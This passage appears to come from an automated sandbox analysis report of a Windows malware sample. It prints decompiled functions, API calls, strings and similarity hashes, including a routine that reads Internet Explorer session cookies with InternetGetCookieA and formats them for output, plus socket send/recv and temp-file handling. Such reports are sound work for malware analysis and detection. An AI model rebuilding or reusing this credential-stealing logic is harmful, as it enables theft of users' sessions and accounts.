											_t14 =  &((_t47 + _t60)[4]); // 0x405bed
											_push( *_t14);
											_push(0);
											_push( *(_t47 + _t60) & 0x0000ffff);
											L14:
											_push(_t53);
											_push(_a4);
											E00407949(_t55, _t56);
										}
									} else {
										_t50 = _t46 + _t60;
										_t9 = _t50 + 8; // 0x405bed
										_t10 = _t50 + 4; // 0x401d10
										if(E00407949(_t55, _t56, _a4, _t53,  *_t10, 1,  *_t9) == 0) {
											goto L8;
										}
									}
								}
								_v8 = _v8 + 1;
								_t27 = _t64 + 8; // 0x4142c0
								_t60 = _v8 << 4;
							} while ( *((intOrPtr*)(_t60 +  *_t27 + 8)) != 0);
						}
						_t30 = _t53 + 0x14; // 0x14
						_t36 = _t30;
					}
					_v12 = _v12 + 1;
					_t64 = _t64 + 0xc;
					if(_v12 < 0xffffffff) {
						continue;
					}
					break;
				}
				return _t35;
			}


















        0x00407a50
        0x00407a50
        0x00407a50
        0x00407a53
        0x00407a54
        0x00407a57
        0x00407a5a
        0x00407a5d
        0x00407a5f
        0x00407a69
        0x00407b1b
        0x00407b20
        0x00407b25
        0x00407b29
        0x00000000
        0x00000000
        0x00407a70
        0x00407a73
        0x00407a75
        0x00407a7b
        0x00407a81
        0x00407a84
        0x00407a8c
        0x00407aca
        0x00407ad2
        0x00407ad4
        0x00407ada
        0x00407ae2
        0x00407ae9
        0x00407aec
        0x00407aee
        0x00407af4
        0x00407af6
        0x00000000
        0x00407af6
        0x00407ae2
        0x00407a92
        0x00407a92
        0x00407a92
        0x00407a9a
        0x00407ab3
        0x00407ab3
        0x00407ab3
        0x00407abb
        0x00407abf
        0x00407abf
        0x00407ac5
        0x00407ac7
        0x00407af8
        0x00407af8
        0x00407af9
        0x00407afc
        0x00407afc
        0x00407a9c
        0x00407a9c
        0x00407a9e
        0x00407aa3
        0x00407ab1
        0x00000000
        0x00000000
        0x00407ab1
        0x00407a9a
        0x00407b01
        0x00407b07
        0x00407b0a
        0x00407b0d
        0x00407a81
        0x00407b18
        0x00407b18
        0x00407b18
        0x00407b2f
        0x00407b32
        0x00407b39
        0x00000000
        0x00000000
        0x00000000
        0x00407b39
        0x00407b43

        APIs
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 00407893
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004078BD
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004078DA
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004078F0
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 0040791E
          • Part of subcall function 00407889: IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 0040792F
        • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00407A84
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead
        • String ID: rsldps
        • API String ID: 2080902951-2437408065
        • Opcode ID: 965b4134c26fd89abf1a72c78b937a70367ccf12d4deff2356b016d57dc73741
        • Instruction ID: b1bf638207e903b645526defd6a29bc71c8650272dbde28238e8b9422891b011
        • Opcode Fuzzy Hash: 965b4134c26fd89abf1a72c78b937a70367ccf12d4deff2356b016d57dc73741
        • Instruction Fuzzy Hash: A2318D71A04209EFDB218F49C885B6AB7F5FB40358F04817AE905A72E1D378FD90CB95
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004135EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E004135EC(signed int __eax, void* __ecx, void* __edx, intOrPtr _a4, char _a8) {
				short _v524;
				short _v1044;
				void* _t22;
				int _t27;
				void* _t28;
				void* _t29;
				signed int _t30;

				_t29 = __edx;
				_t28 = __ecx;
				_t30 = __eax;
				_t27 = 0;
				if(GetTempPathW(0xf6,  &_v1044) - 1 <= 0xf5 && GetTempFileNameW( &_v1044, 0x4040c4, 0,  &_v524) > 0 && E00410093( &_v524) != 0) {
					_t22 = E00411EB3( &_v524, _a4, _t30 & 0x00000001);
					_t35 = _t22;
					if(_t22 != 0) {
						_t7 =  &_a8; // 0x405420
						_t27 = E00413599(_t28, _t29, _t35,  &_v524, _a4,  *_t7);
						E00410093( &_v524);
					}
				}
				return _t27;
			}










        0x004135ec
        0x004135ec
        0x004135f7
        0x00413605
        0x00413613
        0x00413651
        0x00413656
        0x00413658
        0x0041365a
        0x0041366c
        0x00413675
        0x00413675
        0x00413658
        0x0041367f

        APIs
        • GetTempPathW.KERNEL32(000000F6,?,00000000,00000000), ref: 00413607
        • GetTempFileNameW.KERNEL32(?,004040C4,00000000,?), ref: 00413629
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Temp$AttributesDeleteNamePath
        • String ID: T@
        • API String ID: 838033943-1862747698
        • Opcode ID: 344d52693c1aa942c6da1bed8c35175132627be7aa3e450a6626d149a5a71b63
        • Instruction ID: 7046ce65caec88e5304bbb8bb97487f4820e7ef8c706e4ca6e52ee9a632ac698
        • Opcode Fuzzy Hash: 344d52693c1aa942c6da1bed8c35175132627be7aa3e450a6626d149a5a71b63
        • Instruction Fuzzy Hash: C4014CB680021C7ADF20AFA0DC49FDB776CAB04349F0445A2BA54A7251D679DAC88B58
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040C692, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46networkCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E0040C692(void* __ecx, void* __edx, void* __esi, char* _a4) {
				long _v8;
				int _t14;
				char* _t23;

				_push(__ecx);
				if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
					_t11 = _v8;
					if(_v8 != 0) {
						_t23 = E0040F14B(_t11);
						if(_t23 != 0) {
							_t14 = InternetGetCookieA(_a4, 0, _t23,  &_v8);
							_t30 = _t14;
							if(_t14 != 0) {
								_push(_t23);
								E0041352B(__ecx, __edx, _t30, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
							}
							E0040F15E(_t23);
						}
					}
				}
				E004053C0(0);
				return E00404FFB();
			}






        0x0040c695
        0x0040c6aa
        0x0040c6ac
        0x0040c6b1
        0x0040c6b9
        0x0040c6bd
        0x0040c6c8
        0x0040c6ce
        0x0040c6d0
        0x0040c6d2
        0x0040c6df
        0x0040c6e4
        0x0040c6e8
        0x0040c6e8
        0x0040c6ed
        0x0040c6b1
        0x0040c6ef
        0x0040c6fb

        APIs
        • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040C6A2
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • InternetGetCookieA.WININET(?,00000000,00000000,?), ref: 0040C6C8
        Strings
        • %SIE session cookies:%S, xrefs: 0040C6D6
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CookieInternet$AllocateHeap
        • String ID: %SIE session cookies:%S
        • API String ID: 1720872598-348586552
        • Opcode ID: f8ce2fd62318af2e62050f072a0c79b576fa053a5e9c00a31dbaf52670bbc3c7
        • Instruction ID: dcbf455fdab095c16112c2c930d64b6f170e0d776b743c08c0d5513f8fd321a2
        • Opcode Fuzzy Hash: f8ce2fd62318af2e62050f072a0c79b576fa053a5e9c00a31dbaf52670bbc3c7
        • Instruction Fuzzy Hash: BAF08732100144FACB31BB67CC49DDF3E6DDEC2B80B00423AF804E6181EA7A9A41D6B8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004119F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E004119F4(intOrPtr _a4, intOrPtr _a12) {
				short _v524;
				void* __edi;
				int _t23;
				intOrPtr _t24;

				_t23 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E00410093( &_v524) != 0) {
					_t24 = _a4;
					E0040F564(PathFindFileNameW( &_v524), _t24 + 3);
					E0040F19A(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t23 = 1;
				}
				return _t23;
			}







        0x00411a08
        0x00411a1e
        0x00411a30
        0x00411a46
        0x00411a53
        0x00411a58
        0x00411a5e
        0x00411a5f
        0x00411a64

        APIs
        • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00411A16
          • Part of subcall function 00410093: SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
          • Part of subcall function 00410093: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00411A3E
          • Part of subcall function 0040F564: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00411A4B,?,?), ref: 0040F577
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
        • String ID: cab
        • API String ID: 2491076439-1787492089
        • Opcode ID: 584a59f9107d50c2214ab54c276517151a8afbcef0b85f2018e8ab7dbd6b4b43
        • Instruction ID: c419cbc84e17439c421b978f46159d22011411f2eaf0fbcd87b47ffe840e8764
        • Opcode Fuzzy Hash: 584a59f9107d50c2214ab54c276517151a8afbcef0b85f2018e8ab7dbd6b4b43
        • Instruction Fuzzy Hash: 3DF0A476A0032467CB209BB5DC09FCB7BAC9F45784F004176BA55F3191DA78AA848AD4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040987D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
        Download Yara Rule
        C-Code - Quality: 37%
        			E0040987D(void* __eax) {
				void* __esi;
				signed int _t10;
				signed int* _t11;
				signed int _t12;
				signed int _t14;
				signed int _t15;
				void* _t16;
				void* _t19;

				_t19 = __eax;
				if(__eax == 0) {
					return __eax;
				}
				 *0x414ed8(0x414a14, _t16);
				_t14 =  *0x414a0c; // 0x6f627965
				_t12 = 0;
				if(_t14 <= 0) {
					L5:
					if(_t12 + 1 == _t14) {
						_t15 = _t14 - 1;
						 *0x414a0c = _t15;
						if(_t15 != 0) {
							E0040F0F6(_t15 << 2, 0x414a10);
						} else {
							E0040F15E( *0x414a10);
							 *0x414a10 =  *0x414a10 & 0x00000000;
						}
					}
					return  *0x414edc(0x414a14);
				} else {
					goto L2;
				}
				do {
					L2:
					_t10 =  *0x414a10; // 0x53647261
					_t11 = _t10 + _t12 * 4;
					if( *_t11 == _t19) {
						 *_t11 =  *_t11 & 0x00000000;
					}
					_t12 = _t12 + 1;
				} while (_t12 < _t14);
				goto L5;
			}











        0x0040987e
        0x00409882
        0x004098eb
        0x004098eb
        0x0040988b
        0x00409891
        0x00409897
        0x0040989b
        0x004098b1
        0x004098b4
        0x004098b6
        0x004098b7
        0x004098bd
        0x004098dd
        0x004098bf
        0x004098c5
        0x004098ca
        0x004098ca
        0x004098bd
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040989d
        0x0040989d
        0x0040989d
        0x004098a2
        0x004098a7
        0x004098a9
        0x004098a9
        0x004098ac
        0x004098ad
        0x00000000

        APIs
        • RtlEnterCriticalSection.NTDLL(tate), ref: 0040988B
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 004098E3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: eyboardState
        • API String ID: 3168844106-1210060208
        • Opcode ID: ced525ba700356d831a76517460a23825368de5532171fdbe8248050f7809006
        • Instruction ID: 572f9b23131d28ea05163e59d5de067029f5390bc21249b7786d70767bda8585
        • Opcode Fuzzy Hash: ced525ba700356d831a76517460a23825368de5532171fdbe8248050f7809006
        • Instruction Fuzzy Hash: 06F0C832A601128BC729BB14F8105AA3365FFD2B55726C03BD40277BA2D7384C01575C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409492, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26threadnetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 15%
        			E00409492(void* __ecx, intOrPtr _a4) {
				char _v5;

				_t14 = __ecx;
				_push(__ecx);
				_push(2);
				_push(1);
				_push( &_v5);
				_push(_a4);
				if( *0x414cf0() == 1) {
					if(_v5 == 5 || _v5 == 4) {
						E004115DE(_a4, _t14);
					} else {
						E004092A5(_a4);
					}
				}
				 *0x414a2c =  *0x414a2c - 1;
				_push(0);
				RtlExitUserThread();
				return 0;
			}




        0x00409492
        0x00409495
        0x00409496
        0x00409498
        0x0040949d
        0x0040949e
        0x004094aa
        0x004094b0
        0x004094c5
        0x004094b8
        0x004094bb
        0x004094bb
        0x004094b0
        0x004094ca
        0x004094d0
        0x004094d2
        0x004094db

        APIs
        • recv.WS2_32(?,?,00000001,00000002), ref: 004094A1
        • RtlExitUserThread.NTDLL(00000000), ref: 004094D2
          • Part of subcall function 004092A5: send.WS2_32(?,00002710,00002710,00000000), ref: 00409348
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ExitThreadUserrecvsend
        • String ID: atorA
        • API String ID: 4259754606-3648288836
        • Opcode ID: f2645b3a3780e7ddadde299d05c2c41efa1bf60b03ae6f5d65ba5a2410d791d9
        • Instruction ID: f80ea95a38a115a291f7c1e786db8706766a393ee6238dab42e445f89a16c80d
        • Opcode Fuzzy Hash: f2645b3a3780e7ddadde299d05c2c41efa1bf60b03ae6f5d65ba5a2410d791d9
        • Instruction Fuzzy Hash: CDF0E5B0218208BFEB019BA0CC09F9E3B64EB01300F40C132F605A40E2C7FACD82878D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040979F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
        Download Yara Rule
        APIs
        • RtlEnterCriticalSection.NTDLL(tate), ref: 004097A9
        • RtlLeaveCriticalSection.NTDLL(tate), ref: 004097D4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: eyboardState
        • API String ID: 3168844106-1210060208
        • Opcode ID: 53a2975af9596d4c70a16e5722e1b0be87ca42e4ce0f8e56fd7927d509260fa9
        • Instruction ID: 2053206ebe207e129efe7e5b98630a271c67ae1d48f85a524ab5b1a75baf01aa
        • Opcode Fuzzy Hash: 53a2975af9596d4c70a16e5722e1b0be87ca42e4ce0f8e56fd7927d509260fa9
        • Instruction Fuzzy Hash: 3AE0DF326A7100CBC6044F28AC805ABB339BAC2B0131D803BE012E7692C3788C41869D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409D36, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
        Download Yara Rule
        C-Code - Quality: 90%
        			E00409D36(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, char _a8) {
				intOrPtr _t4;
				int _t5;
				intOrPtr _t8;
				intOrPtr _t10;

				_t10 = __edx;
				_t8 = __ecx;
				_t4 = 0x40220d;
				if(__edx == 0) {
					_t10 = 0x40220d;
				}
				if(_t8 == 0) {
					_t8 = _t4;
				}
				if(_a4 != 0) {
					_t4 = _a4;
				}
				_t3 =  &_a8; // 0x40220d
				_t5 = wnsprintfA( *_t3, 0x103, "%s|%s|%s", _t4, _t8, _t10);
				asm("sbb al, al");
				return _t5 + 0xfffffffffffffffc;
			}







        0x00409d36
        0x00409d36
        0x00409d36
        0x00409d3d
        0x00409d3f
        0x00409d3f
        0x00409d43
        0x00409d45
        0x00409d45
        0x00409d4c
        0x00409d4e
        0x00409d4e
        0x00409d5f
        0x00409d63
        0x00409d76
        0x00409d7a

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: wnsprintf
        • String ID: "@$%s|%s|%s
        • API String ID: 167729887-1717862645
        • Opcode ID: 61a0b9dda64d5411add998814e7666225307bae45766fe68f3274c5548608a9c
        • Instruction ID: 80b69b96e8c423e1bf09e1a2d01e3bacc82d6d85d30929f6c5b32588fe51efd6
        • Opcode Fuzzy Hash: 61a0b9dda64d5411add998814e7666225307bae45766fe68f3274c5548608a9c
        • Instruction Fuzzy Hash: 7CE086707812016BEB185668CD59B7F2195DFE0704F14C53DB962AA2E2E778CC54C719
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00412C8D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00412C8D() {
				short _v524;
				WCHAR** _t6;

				E0040AE3C(0x4153a8);
				_t6 =  *0x414ad4; // 0x241f5a8
				PathCombineW( &_v524,  *_t6, _t6[1]);
				PathCombineW(0x4153a8, 0x4153a8,  &_v524);
				return 0x4153a8;
			}





        0x00412c9e
        0x00412ca3
        0x00412cb4
        0x00412cc3
        0x00412ccd

        APIs
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
        • PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$Combine$FolderSpecial
        • String ID: yNameW
        • API String ID: 2638848501-1413253154
        • Opcode ID: 70ef86ef876dd58c4ae2c14954fe5a8639fcb4aa71770df5c35ce9df31cf3eb8
        • Instruction ID: e8d3ca7cb42886c3d68fd82b6469ded5b7716b08c04af3e1d15b6de6e7007ad8
        • Opcode Fuzzy Hash: 70ef86ef876dd58c4ae2c14954fe5a8639fcb4aa71770df5c35ce9df31cf3eb8
        • Instruction Fuzzy Hash: A5E08636901228ABCB406794DC4CCCA7B6CDF85344B0180B1B914E3321DA74D955CBD9
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040ECEA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
        Download Yara Rule
        C-Code - Quality: 37%
        			E0040ECEA() {
				intOrPtr _v0;
				void* __esi;

				 *0x414ed8(0x414f80);
				if(E0040EBE3(_v0) != 0) {
					E0040EC78(_t3, 0);
				}
				return  *0x414edc(0x414f80);
			}





        0x0040ecf1
        0x0040ed02
        0x0040ed09
        0x0040ed0e
        0x0040ed17

        APIs
        • RtlEnterCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040ECF1
        • RtlLeaveCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 0040ED10
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: urityDescriptorToAccessNamedA
        • API String ID: 3168844106-657014366
        • Opcode ID: 160245b17f58b9328896003184254241032bbd90a35072ab70045f2fa87f5015
        • Instruction ID: 7417f3e59bc3d2f83629a325cde0aa874c47eef3d368822d84efd257a25f333c
        • Opcode Fuzzy Hash: 160245b17f58b9328896003184254241032bbd90a35072ab70045f2fa87f5015
        • Instruction Fuzzy Hash: 29D0A73324421166D2102727AC0CFEF7D6CAFC17A0F09883BF104A61A4C7788472826C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004063F9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
        Download Yara Rule
        C-Code - Quality: 16%
        			E004063F9() {

				 *0x414ed8(0x4147a4);
				E0040F15E( *0x4147c4);
				 *0x4147bc =  *0x4147bc & 0;
				 *0x4147c4 =  *0x4147c4 & 0;
				 *0x4147a0 = 0;
				 *0x414edc(0x4147a4);
				return 0;
			}



        0x00406400
        0x0040640c
        0x00406413
        0x00406419
        0x00406420
        0x00406426
        0x0040642d

        APIs
        • RtlEnterCriticalSection.NTDLL(004147A4), ref: 00406400
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RtlLeaveCriticalSection.NTDLL(004147A4), ref: 00406426
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterFreeHeapLeave
        • String ID: MessageW
        • API String ID: 3296397286-511154193
        • Opcode ID: 40109aba409ec2952434b72fdffee511761230f64915fa97890a5c842d985bff
        • Instruction ID: 1d2f382544fb96352087c96c09e9d3298041424ba7a83dee8a4a2dab7bdcbfa9
        • Opcode Fuzzy Hash: 40109aba409ec2952434b72fdffee511761230f64915fa97890a5c842d985bff
        • Instruction Fuzzy Hash: 3BD09236831261DF87016BA4FC054D676A8FF86716315C17AE428911F0D77909908B9C
        Uniqueness

        Uniqueness Score: -1.00%